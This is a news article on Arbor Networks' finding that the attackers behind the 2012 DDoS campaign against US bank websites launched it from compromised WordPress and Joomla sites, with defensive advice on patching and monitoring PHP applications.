Bank Attackers Used PHP Websites As Launch Pads

WordPress sites with outdated TimThumb plug-in were among PHP-based sites hackers used to launch this falls massive DDoS attacks, reports Arbor Network.

Who Is Hacking U.S. Banks? 8 Facts (click image for larger view and for slideshow)
The group that began targeting U.S. bank websites in September launched their large-scale, distributed denial-of-service (DDoS) attacks via a number of PHP-based websites that theyd previously exploited.
That finding comes from Arbor Networks, which said that attackers had compromised numerous PHP Web applications, such as Joomla, as well as many WordPress sites, many of which were using an outdated version of the
TimThumb plug-in
. After compromising the sites, attackers then loaded toolkits onto the sites that turned them into DDoS attack launch pads.
Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools, according to a
blog post
by Dan Holden and Curt Wilson, who are part of the security engineering and response team at Arbor Networks.
[ Build bullet-proof Web apps. Read
6 Ways To Strengthen Web App Security
. ]
After compromising the PHP-based websites and loading their attack toolkits, the bank attackers then either connected directly to the sites to issue commands, or else used intermediate servers, proxies or scripts. The particular attack tool that was most used by attackers, according to Arbor, was the
itsoknoproblembro toolkit
, which is also known as Brobot. Two other tools, KamiKaze and AMOS, were also used, but less frequently.
Those tools enabled attackers to launch a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols, said Holden and Wilson. The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, to multiple companies in the same vertical.
The
scale of those DDoS attacks
disrupted the websites of leading Wall Street firms, including Bank of America, BB&T, JPMorgan Chase, Capital One, HSBC, New York Stock Exchange, Regions Financial, SunTrust, U.S. Bank and Wells Fargo. That was despite the attackers
previewing which sites would be attacked
, as well as the date and time their attacks would commence.
In late October, after more than a month of bank website attacks, the hacktivist group that claimed credit for the so-called Operational Ababil campaign
promised a pause
in its efforts. But the group broke its silence earlier this week, when it reemerged and promised to begin attacks this week against Bank of America, JPMorgan Chase, PNC Financial Services Group, SunTrust Banks and U.S. Bancorp.
Those attacks appeared to recommence Tuesday. A spokesman for PNC confirmed Thursday via email that the banks website had been seeing an unusual volume of electronic traffic at our Internet connection. But he declined to comment on whether that traffic had been caused by DDoS attacks.
According to Arbor, the new attacks looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2, showing that attackers techniques are continuing to evolve.
What lessons can businesses draw from the Arbor finding that the DDoS bank attackers are using vulnerable WordPress and PHP sites as staging grounds? For starters, businesses should keep an eye on their websites for signs of outdated or unsecured PHP applications -- and not just to help prevent DDoS attacks. Indeed, criminals often use exploited websites to launch attacks and store stolen information.
WordPress enables these organizations to set up an infrastructure on the Internet that exacerbates the challenge of locating them, said Jim Butterworth, CSO of HBGary, speaking by phone. Theyre using it as an opportunistic technique for lifting stolen information, more so than using WordPress as an attack vector.
The gang behind the
Eurograbber attack campaign
, for example, reportedly used Zitmo Trojan spyware to steal $47 million or more from over 30,000 corporate and private banking customers. Although the gang used command-and-control servers to manage PCs infected with its malware, it had also exploited PHP websites to create
drop zones
for storing stolen information, as well as for pushing additional attack code to infected PCs. Using drop zones -- as a kind of criminal Dropbox -- helps attackers better cover their tracks and evade security defenses.
Despite those criminal tactics, Butterworth said businesses shouldnt avoid using PHP-based applications such as WordPress. Instead, they should inventory which PHP applications are being used, log network traffic to reveal inbound PHP requests that expose would-be attackers probing for such applications, and ensure that the PHP applications remain hardened against the toolkits and vulnerabilities used to exploit them. Locate, patch and watch. Thats the advice, he said.
Storing and protecting data are critical components of any successful cloud solution. Join our webcast, Cloud Storage Drivers: Auto-provisioning, Virtualization, Encryption, to stay ahead of the curve on automated and self-service storage, enterprise class data protection and service level management.
Watch now or bookmark for later
.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Bank Attackers Used PHP Websites As Launch Pads